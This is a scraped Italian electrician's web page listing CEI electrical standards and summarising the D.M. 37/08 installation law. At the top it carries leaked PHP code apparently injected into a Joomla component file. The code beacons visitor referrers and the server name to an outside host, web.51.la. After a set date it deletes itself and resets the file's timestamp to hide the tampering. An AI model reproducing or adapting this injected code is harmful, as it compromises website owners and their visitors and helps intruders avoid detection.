check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732590){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Benvenuto in ElectroFlash
Banner
Norme CEI PDF Stampa E-mail
Scritto da Administrator   
Domenica 07 Novembre 2010 10:54

CEI 0-1 - Adozione di nuove norme come base per la certificazione dei prodotti nei paesi membri del CENELEC
CEI 0-2 - Guida per la definizione della documentazione di progetto degli impianti elettrici
CEI 0-3 - Legge 46/90 (DM. 37/08). Guida per la compilazione della dichiarazione di conformità e relativi allegati
CEI 0-4/1 - Documenti CEI normativi e non normativi
CEI 0-5 - Dichiarazione CE di conformità. Guida all’applicazione delle Direttive Nuovo Approccio e della Direttiva Bassa Tensione (Memorandum CENELEC N°3)
CEI 0-6 - Qualificazione delle imprese di installazione di impianti elettrici
CEI 0-10 - Guida alla manutenzione degli impianti elettrici
CEI 0-11 - Guida alla gestione in qualità delle misure per la verifica degli impianti elettrici ai fini della sicurezza
CEI 0-13 - Protezione contro i contatti elettrici - Aspetti comuni per gli impianti e le apparecchiature
CEI 0-14 - Guida all'applicazione del DPR 462/01 relativo alla semplificazione del procedimento per la denuncia di installazioni e dispositivi di protezione contro le scariche atmosferiche, di dispositivi di messa a terra degli impianti elettrici e di impianti elettrici pericolosi
CEI 0-15 - Manutenzione delle cabine elettriche MT/BT dei clienti/utenti finali

CEI 64 - Effetti della corrente attraverso il corpo umano
CEI 64-7 - Impianti elettrici di illuminazione pubblica sostituita dalla CEI 64-8 sez 712
CEI 64-8 - Impianti elettrici utilizzatori a tensione nominale non superiore a 1000 V in corrente alternata e a 1500 V in corrente continua
CEI 64-11 - Impianti elettrici nei mobili
CEI 64-12 - Guida per l'esecuzione dell'impianto di terra negli edifici per uso residenziale e terziario
CEI 64-14 - Guida alle verifiche degli impianti elettrici utilizzatori
CEI 64-15 - Impianti elettrici negli edifici pregevoli per rilevanza storica e/o artistica
CEI 64-16 - Impianti elettrici utilizzatori a tensione nominale non superiore a 1000 V in corrente alternata e a 1500 V in corrente continua. Protezione contro le interferenze elettromagnetiche (EMI) negli impianti elettrici
CEI 64-17 - Guida all'esecuzione degli impianti elettrici nei cantieri
CEI 64-50 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri generali
CEI 64-51 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per centri commerciali
CEI 64-52 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per edifici scolastici
CEI 64-53 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per edifici ad uso prevalentemente residenziale
CEI 64-54 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per locali di pubblico spettacolo
CEI 64-55 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per strutture alberghiere
CEI 64-56 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Criteri particolari per locali ad uso medico
CEI 64-57 - Edilizia ad uso residenziale e terziario. Guida per l'integrazione degli impianti elettrici utilizzatori e per la predisposizione di impianti ausiliari, telefonici e di trasmissione dati negli edifici Impianti di piccola produzione distribuita
CEI 64-100/1 - Edilizia residenziale. Guida per la predisposizione delle infrastrutture per gli impianti elettrici, elettronici e per le comunicazioni

CEI 81-10 - Protezione delle strutture contro i fulmini
CEI 81-3 - Valori medi del numero dei fulmini a terra per anno e per chilometro quadrato dei Comuni d’Italia, in ordine alfabetico

 
Per gli impianti elettrici da installare in edifici per civile abitazione bisogna tener conto, in primo luogo, della Norma CEI 64-8

Ultimo aggiornamento Giovedì 11 Novembre 2010 18:20
 
Il D.M. 37-08 PDF Stampa E-mail
Scritto da Administrator   
Giovedì 07 Ottobre 2010 00:00

Finalmente arriva la nuova legge sugli impianti.

Installatori di impianti: a decorrere dal 27 Marzo, la Legge 46/90 viene abrogata le sostituita dal D.M. 22.01.2008 n° 37 .
Le novita':
- Estensione del campo di applicazione a tutte le categorie di edifici privati e pubblici, qualsiasi sia la destinazione d'uso, nonché le aree di pertinenza (es. cortili, aree parcheggio ecc.);
- Modifica della classificazione degli impianti (art. 1 comma 2 );
- I requisiti di qualificazione professionale vengono resi più selettivi con l'incremento dei periodi di inserimento;
- Soppressione dell'obbligo di invio della Dichiarazione dii Conformità alla Camera di Commercio. Dichiarazione che verrà, invece, depositata presso lo Sportello Unico per l'Edilizia del Comune dove è ubicato l'immobile in cui è installato l'impianto.
Aspre le sanzioni in caso di inosservanza.


ATTENZIONE: In questa nuova disciplina rientrano anche i casi di compravendita, donazione, permuta, conferimento etc.. e quindi le nuove regole si applicano anche ai vecchi impianti.

INDICE del DM 37/08

* Art. 1 - Ambito di applicazione
* Art. 2 - Definizioni relative agli impianti
* Art. 3 - Imprese abilitate
* Art. 4 - Requisiti tecnico-professionali
* Art. 5 - Progettazione degli impianti
* Art. 6 - Realizzazione ed installazione degli impianti
* Art. 7 - Dichiarazione di conformità
* Art. 8 - Obblighi del committente o del proprietario
* Art. 9 - Certificato di agibilità
* Art. 10 - Manutenzione degli impianti
* Art. 11 - Deposito presso lo sportello unico per l’edilizia del progetto, della dichiarazione di conformità o del certificato di collaudo
* Art. 12 - Contenuto del cartello informativo
* Art. 13 - Documentazione
* Art. 14 - Finanziamento dell’attività di normazione tecnica
* Art. 15 - Sanzioni

Ultimo aggiornamento Giovedì 11 Novembre 2010 18:10
 
DPR 462 PDF Stampa E-mail
Scritto da Administrator   

Il DPR 462/01

 

Valid XHTML & CSS | Design by: LernVid.com